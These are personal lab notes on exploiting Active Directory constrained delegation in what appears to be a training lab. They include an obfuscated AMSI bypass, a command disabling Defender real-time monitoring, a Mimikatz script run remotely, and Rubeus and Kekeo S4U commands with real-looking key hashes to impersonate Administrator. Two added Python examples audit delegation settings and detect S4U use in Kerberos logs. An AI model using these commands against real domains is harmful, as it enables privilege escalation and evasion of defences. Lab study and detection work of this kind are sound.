👨‍✈️Exploit Constrained Delegation and execute privileged operations

We are going to start by enumerating users with constrained delegation ->

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
. C:\AD\Tools\PowerView.ps1
Get-DomainUser -TrustedToAuth 
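What the -TrustedToAuth filter actually matches is the TRUSTED_TO_AUTH_FOR_DELEGATION bit of userAccountControl (protocol transition); the targets come from msDS-AllowedToDelegateTo. The Python below is an added example, not code from these notes or from PowerView, that classifies accounts from a constructed LDAP export the way an auditor would: protocol transition versus Kerberos-only constrained delegation, high-value target services, and accounts protected by the NOT_DELEGATED flag. The sample records, every host other than dcorp-mssql, and the HIGH_VALUE_SERVICES list are assumptions.

```python
"""Classify Active Directory accounts by delegation type from an LDAP export.

Added example (not from the original notes): shows what the userAccountControl
bits and msDS-AllowedToDelegateTo mean for an auditor. Records are constructed.
"""
from collections import defaultdict

# userAccountControl flags (documented values for the attribute).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self allowed)

# Assumed list: services whose impersonated access usually means code execution or data access.
HIGH_VALUE_SERVICES = {"cifs", "host", "ldap", "http", "mssqlsvc", "wsman", "rpcss"}

# Constructed sample export: websvc's target is the one enumerated above, the rest are made up.
SAMPLE_EXPORT = [
    {"sAMAccountName": "websvc", "userAccountControl": 16843264,
     "msDS-AllowedToDelegateTo": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL", "CIFS/dcorp-mssql"]},
    {"sAMAccountName": "appsrv01$", "userAccountControl": 16781312,
     "msDS-AllowedToDelegateTo": ["time/dc01.dollarcorp.moneycorp.local"]},
    {"sAMAccountName": "reportsvc", "userAccountControl": 66048,
     "msDS-AllowedToDelegateTo": ["HTTP/web01.dollarcorp.moneycorp.local"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 1114624,
     "msDS-AllowedToDelegateTo": []},
]


def classify(record):
    """Return the delegation type for one account record."""
    uac = int(record["userAccountControl"])
    targets = record.get("msDS-AllowedToDelegateTo") or []
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        # Can obtain a ticket for any user to these targets via S4U2Self + S4U2Proxy,
        # without that user ever authenticating to it.
        return "constrained-protocol-transition"
    if targets:
        # Only forwards tickets of users who already authenticated to it with Kerberos.
        return "constrained-kerberos-only"
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "protocol-transition-without-targets"
    return "none"


def high_value_targets(targets):
    """Subset of SPNs whose service class is in HIGH_VALUE_SERVICES."""
    return [t for t in targets if t.split("/", 1)[0].lower() in HIGH_VALUE_SERVICES]


def audit(records):
    """One finding per account that has any delegation configured."""
    findings = []
    for r in records:
        kind = classify(r)
        if kind == "none":
            continue
        targets = r.get("msDS-AllowedToDelegateTo") or []
        findings.append({
            "account": r["sAMAccountName"],
            "kind": kind,
            "targets": targets,
            "high_value_targets": high_value_targets(targets),
        })
    return findings


def protected_accounts(records):
    """Accounts marked 'sensitive and cannot be delegated': the KDC will not issue a
    forwardable ticket for them, so S4U2Proxy in their name fails."""
    return [r["sAMAccountName"] for r in records if int(r["userAccountControl"]) & NOT_DELEGATED]


def delegating_accounts_by_host(records):
    """Map each target host to the accounts allowed to delegate to it ("who can reach host X?")."""
    by_host = defaultdict(set)
    for r in records:
        for spn in r.get("msDS-AllowedToDelegateTo") or []:
            host = spn.split("/", 1)[1].split(":")[0].lower() if "/" in spn else spn.lower()
            by_host[host].add(r["sAMAccountName"])
    return {h: sorted(a) for h, a in by_host.items()}


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORT):
        print(f"{f['account']:<16} {f['kind']:<36} {', '.join(f['targets'])}")
    print("protected:", protected_accounts(SAMPLE_EXPORT))
    print("by host:", delegating_accounts_by_host(SAMPLE_EXPORT))
```

The split between the two constrained kinds is the point: a Kerberos-only entry can only forward tickets of users who actually authenticated to the service, while the protocol-transition kind (what -TrustedToAuth lists) lets the account mint tickets for anyone who is not protected, which is why the privileged accounts in the last function belong in Protected Users or carry the NOT_DELEGATED flag.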

We can either use Kekeo or Rubeus to abuse that.

Let's start with Rubeus -> First we need to encode "s4u" with Argsplit

Since I'm not very meticulous, I didn't note websvc's secrets, so I need to do it again ->

PS C:\AD\Tools> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> . .\PowerUp.ps1
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Enter-PSSession dcorp-adminsrv
[dcorp-adminsrv]: PS C:\Users\student613\Documents> Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
[dcorp-adminsrv]: PS C:\Users\student613\Documents> cd 'C:\Program Files\'
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1

Now let's launch Rubeus with the encoded s4u argument:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

In the course there's an error in the server name: it is dcorpmssql and not dcorp-mssql.

And now we can access dcorp-mssql:

Now we're going to abuse Constrained Delegation using websvc with Kekeo

Let's use the tgt::ask module from Kekeo to request a TGT for websvc. Note that we are using the NTLM hash of websvc here just to show that an NTLM hash can be used too:

cd .\kekeo\x64
.\kekeo.exe 
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f 

Now, let's use this TGT and request a TGS. Note that we are requesting a TGS to access cifs/dcorp-mssql as the domain administrator - Administrator ->

tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

Now we can inject the ticket into the current session to use it.

(will finish kekeo later)
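From the domain controller's side, the Kekeo flow above (a TGT requested with the RC4 key, then an S4U TGS for Administrator) shows up as a 4768 event whose Ticket Encryption Type is 0x17 and a 4769 event whose Transited Services field names the delegating account. The Python below is an added example, not from these notes, that parses constructed events in that shape and flags both; the event text, client addresses, PRIVILEGED and AES_ACCOUNTS sets are assumptions.

```python
"""Spot S4U2Proxy use and RC4 TGT requests in Kerberos audit events.

Added example (not part of the original notes). The event text is constructed to
mirror the Security log fields of 4768/4769, not captured from the lab.
"""

SAMPLE_EVENTS = """\
EventID: 4768
Account Name: websvc
Supplied Realm Name: DOLLARCORP.MONEYCORP.LOCAL
Ticket Encryption Type: 0x17
Client Address: ::ffff:10.0.0.25
---
EventID: 4769
Account Name: Administrator@DOLLARCORP.MONEYCORP.LOCAL
Service Name: DCORP-MSSQL$
Ticket Encryption Type: 0x12
Transited Services: websvc@DOLLARCORP.MONEYCORP.LOCAL
Client Address: ::ffff:10.0.0.25
---
EventID: 4769
Account Name: student613@DOLLARCORP.MONEYCORP.LOCAL
Service Name: DCORP-MSSQL$
Ticket Encryption Type: 0x12
Transited Services: -
Client Address: ::ffff:10.0.0.40
"""

# Assumed: accounts treated as privileged for alert severity.
PRIVILEGED = {"administrator"}
# Assumed: accounts known to hold AES keys (e.g. from msDS-SupportedEncryptionTypes);
# a TGT for them negotiated with RC4 (0x17) deserves a look.
AES_ACCOUNTS = {"websvc"}


def parse_events(text):
    """Parse 'Key: value' blocks separated by '---' lines into dicts."""
    events = []
    for block in text.split("---"):
        fields = {}
        for line in block.strip().splitlines():
            key, _, value = line.partition(":")
            if key.strip():
                fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def _account(name):
    """'user@REALM' -> 'user', lower-cased for comparison."""
    return name.split("@", 1)[0].lower()


def find_s4u2proxy(events, privileged=PRIVILEGED):
    """4769 events with a populated Transited Services field: the ticket was obtained
    through delegation, and the field names the account that delegated."""
    hits = []
    for e in events:
        if e.get("EventID") != "4769":
            continue
        transited = e.get("Transited Services", "-")
        if transited in ("", "-"):
            continue
        user = _account(e.get("Account Name", ""))
        hits.append({
            "impersonated_user": user,
            "delegating_account": _account(transited),
            "service": e.get("Service Name", ""),
            "client": e.get("Client Address", ""),
            "privileged": user in privileged,
        })
    return hits


def find_rc4_tgt_requests(events, aes_accounts=AES_ACCOUNTS):
    """4768 events that negotiated RC4 (0x17) for an account whose keys are AES."""
    return [
        {"account": _account(e.get("Account Name", "")), "client": e.get("Client Address", "")}
        for e in events
        if e.get("EventID") == "4768"
        and e.get("Ticket Encryption Type", "").lower() == "0x17"
        and _account(e.get("Account Name", "")) in aes_accounts
    ]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for h in find_s4u2proxy(evs):
        print("S4U2Proxy:", h)
    for r in find_rc4_tgt_requests(evs):
        print("RC4 TGT for AES-capable account:", r)
```

Two caveats when turning this into a rule: Transited Services is populated for legitimate constrained delegation too, so the signal is the pairing (a privileged impersonated user, or a delegating account and target service that were not expected together), and 0x17 still appears from legacy clients in domains where RC4 is enabled, so alert on the mismatch against an account's usual encryption type rather than on every RC4 request.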

Now we're going to abuse Constrained Delegation using dcorp-adminsrv with Rubeus

We have the AES keys of dcorp-adminsrv$ from the dcorp-adminsrv machine.
